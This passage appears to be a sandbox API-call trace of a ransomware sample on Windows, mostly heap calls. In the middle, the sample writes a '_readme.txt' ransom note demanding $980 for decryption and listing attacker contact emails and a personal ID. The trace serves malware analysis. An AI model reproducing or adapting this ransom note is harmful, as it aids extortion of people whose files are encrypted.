Size=0x840) returned 0x9c5da58 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.254] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.256] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0056.256] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.256] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.256] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.256] PathFindFileNameW (pszPath="") returned="" [0056.257] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.257] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.257] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.257] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.257] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0056.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.257] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.257] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0056.257] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.257] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.257] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.258] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x326aa18 [0056.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326aa18, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0056.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.258] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.258] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.259] CloseHandle (hObject=0x5c8) returned 1 [0056.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.259] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.260] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.260] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.260] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.260] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.260] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.260] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.261] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 